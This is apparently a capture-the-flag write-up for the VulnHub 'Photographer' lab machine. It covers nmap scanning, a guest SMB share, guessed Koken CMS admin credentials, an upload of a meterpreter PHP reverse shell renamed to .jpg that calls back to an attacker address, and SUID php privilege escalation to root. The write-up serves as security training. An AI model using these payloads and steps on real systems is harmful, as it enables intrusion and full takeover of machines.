Vulnhub Photographer Writeup
Welcome again, friends. Today you will be learning SUID exploitation on another program which is extremely unusual. This is the first time I have seen anyone setting SUID bit on the program
The machine I will be using is provided by VulnHub and is available here – https://www.vulnhub.com/entry/photographer-1,519/
Download and configure the machine with DHCP, I will start from the reconnaissance phase
Reconnaissance
The IP address of the box is 10.10.10.8. I have used Nmap to find open ports and run default scripts on them
nmap -sV --min-rate 1000 -sC 10.10.10.8
The above command gave me 4 open ports, in which two caught my eyes.
- 8000 – Serving a CMS
- 445 – SMB
The webapp is running Koken CMS for phototography
The SMB security model uses a guest account which means you can log in to SMB without any password and download the files. I found a share sambashare that contains two files
- wordpress.bkp.zip
- mailsent.txt
On further directory busting I couldn't found any WordPress directory. Later I started looking mailsent.txt file and found a conversation that looked like a developer is giving information to the website owner with some password details. At this time, gobuster has shown me /admin/
After reading and applying naive combinations of the secret "my babygirl", I finally managed to log in to the admin panel on URL http://10.10.10.8/admin/ using daisa@photographer.com:babygirl
credentials
Initial Foothold
While searching on in exploitdb database, I found that actually someone has reported this vulnerability and the author has submitted steps to reproduce the bug
Here I have generated a meterpreter reverse shell and renamed it to .jpg file as instructed by the author
msf6 > use payload/php/meterpreter/reverse_tcp
msf6 payload(php/meterpreter/reverse_tcp) > set lhost 10.10.10.5
msf6 payload(php/meterpreter/reverse_tcp) > set lport 4444
msf6 payload(php/meterpreter/reverse_tcp) > generate -f raw -o image.php.jpg
After tampering request and visiting the web shell URL, I got the reverse meterpreter shell.
Privilege Escalation
Firstly, use the execute
command on the meterpreter to get an interactive bash shell. This will save you a lot of time
meterpreter > execute -f /bin/bash -i -a "-i"
After you have done this, spawn a pty shell using python
python -c "import pty; pty.spawn('/bin/bash')"
Use the find command to hunt for SUID binaries. This is the very first step in privilege escalation. If you want a refresher, read these posts first – Demystifying SUID and SGID bits and Exploiting SUID Binaries to Get Root User
I found that /usr/bin/php.7.2
is an unusual file. Since I am not familiar with php, I took help from GTFO bins SUID exploitation of PHP. As soon as I executed the command, it spawned a privileged shell.
Since you have root user permissions, so you can now look for the user.txt file also using the command.
find / -type f -name user.txt -exec cat {} \; 2> /dev/null